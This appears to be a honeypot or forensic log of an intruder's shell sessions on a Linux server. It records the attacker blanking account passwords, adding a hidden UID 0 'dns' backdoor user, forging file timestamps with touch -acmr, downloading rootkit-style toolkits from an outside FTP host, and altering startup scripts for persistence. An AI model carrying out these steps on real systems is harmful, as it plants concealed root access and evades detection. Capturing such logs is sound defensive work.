connection from 207.35.251.172 to 192.168.1.102 at port 21
==========================================================
id
w
dir
cd /usr
ls
cd local
dir
cd bin
dir
cd etc
ls --color
cd ..
cd etc
ls--color
ls
dir
pwd
cd ..
cd doc
dir
cd /tmp
dir
cd /
dir
cd dev
ls
cd /etc/X11/applnk
ls
cd internet
cd Internet
ls
pwd
passwod nobody -d

connection from 207.35.251.166 from 61209 to 192.168.1.102 at port 23
=====================================================================
login
w
logoff

connection from 207.35.251.172 to 192.168.1.102 at port 21
==========================================================
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/X11/applnk/Internet/.etc
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc
ls [in /]
ls -s
ls -a
ls -n
ls -lt
cd etc
ls -lt
cat passwd-

connection from 207.35.251.166 from 61216 to 192.168.1.102 at port 23
=====================================================================
login through nobody account

su dns
w
cd /tmp
mc -s  [xxx]
cd /dev/rd
ftp teleport.go.or
mkdir sdc0
cd sdc0
ftp teleport.go.or
get Zer0.tar.gz
get copy.tar.gz
get ooty.tar.gz
bye
tar zxvf Zer0.tar.gz
cd Zer0
ls
./Go 24

connection collected from the slog2.dat
=======================================

w
whoami
cd /dev/rd/sdc0
ls
rm Zer0.tar.gz
ls
alias ls='ls --color'
ls
ls
passwd nobody [???]
[uucp???]
ping www.yahoo.com
pico /etc/rc.d/rc3.d/S50inet
ls
mv copy.tar.gz /usr/X11R6/bin/.,/copy
cd /usr/x11/R6/bin/.,/copy
mv copy.tar.gz ../
ls
cd ..
tar zxvf copy.tar.gz
chmod 7777 *
ls
rm copy.tar.gz
cd copy
chmod 7777 *
ls
uname -r
pstree
---